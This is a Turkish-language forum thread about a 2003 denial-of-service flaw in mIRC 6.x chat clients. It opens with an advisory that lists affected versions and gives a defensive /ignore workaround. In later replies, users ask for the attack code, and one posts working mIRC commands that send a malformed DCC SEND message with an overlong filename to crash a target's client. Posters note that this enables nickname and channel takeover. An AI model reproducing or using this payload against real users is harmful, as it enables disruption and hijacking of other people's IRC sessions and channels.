12 Ekim 2003'de en populer sohbet programi mIRC'in 6.* surumlerini etkileyen bir guvenlik acigi bulundu. Eger size saldirirlarsa mIRC "Bu program gecersiz bir islem yuruttu ve kapatilacak" hatasi veriyor ve mecburen kapatiliyor.



Ve gelen hata mesajinin ayrintilari;

MIRC, geçersiz sayfa hatasina neden oldu;
birim: MIRC.EXE konum 019f:004edf60.
Yazmaçlar:
EAX=fffffffe CS=019f EIP=004edf60 EFLGS=00010282
EBX=0081e178 SS=01a7 ESP=0081c9dc EBP=0081e108
ECX=00000000 DS=01a7 ESI=0081cb42 FS=adaf
EDX=0081ca20 ES=01a7 EDI=0081e158 GS=0000
CS:EIP:'deki Baytlar
8a 18 84 db 0f 85 4b ff ff ff c6 45 00 00 5f 5e
Yigin dökümü:
00000000 00000029 0081d5e8 0081e108 0000002a 0081ca20 004566ed 0081e108 00000180 00000000 00f5804c 0081d5e8 00000002 00000001 00f5804c 00000ad0

Bu guvenlik acigini tasiyan surumler;
mIRC 6.11
mIRC 6.1
mIRC 6.03
mIRC 6.02
mIRC 6.01
mIRC 6.00
Bu aciktan dolayi eski bir surum kullanmanizida tavsiye etmiyorum cunku eski surumlerde de bilinen aciklar var.
mIRC'in yapimcisi Khaled resmi guncellemeyi yakinda yapacagini acikladi...



--------------------------------------------------------------------------------

Bu guvenlik acigindan resmi yeni surum cikana kadar
/ignore -wd *
komutunu mIRC'de yazarak korunabilirsiniz.


--------------------------------------------------------------------------------



Bu komut ne ise yarar?
Bu komut basitce butun DCC alis-verislerini kapatir. Komuttaki -d DCC'i, -w 'de baglandiginiz butun serverlarda ignore etmenizi saglar.
Ignore komutu hakkinda ayrintili bilgiyi Ingilizce olarak mIRC'de "/help /ignore" yazarak gorebilirsiniz.

Simdi nasil dosya indirecegim?
DCC'i ignore ettigimiz icin kimseden dosya alamazsiniz. Eger almak istiyorsaniz "/ignore -x nickname" yazarak o kisinin size dosya gondermesine izin verebilirsiniz. Fakat o kiside size bu guvenlik acigiyla zarar verebilir. O yuzden bunu SADECE guvendiginiz insanlar icin uygulayin.

Bu guvenlik acigi nedir? Nasil uygulanir?
Bu acigin detaylarini, nasil isledigini anlatamam cunku henuz herkes bu aciktan korunmuyor. Belki resmi yeni surum ciktiktan sonra...

Bu saldiri bana ne gibi zarar verir?
Bu saldiri *SADECE* mIRC'in kapanmasina yol acar. Boylelikle saldirgan nick'inizi ele gecirebilir yada bir kanaldaki oplara saldirip kanali ele gecirebilir.


Mircin son versiyonu v6.14 buradan indire bilirsiniz . http://www.ircoper.com/mirc/mirc614.exe

Senden isteğimiz bunu bizimle paylaşman RICA EDIYORUZ.

Bunu yazarım ama insanlar bunu kötü niyetli kullanabilir, Ayrica bir çok server buna önlem aldı işleyen pek azdir ama genede bir çok yerde işliyor, ayrica ban hatta akill bile yiyebilirsiniz.

ceptocan ben kodu biliyorum.. ama sen yinede yaz zaten heryerde var ve çoğu server önlemini aldı.. Millet bilsin

buyrun isteyene

/crash { raw PRIVMSG $$1 :
DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x ::x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 }



Connectin reset yapar
/quote PRIVMSG Nick :
DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x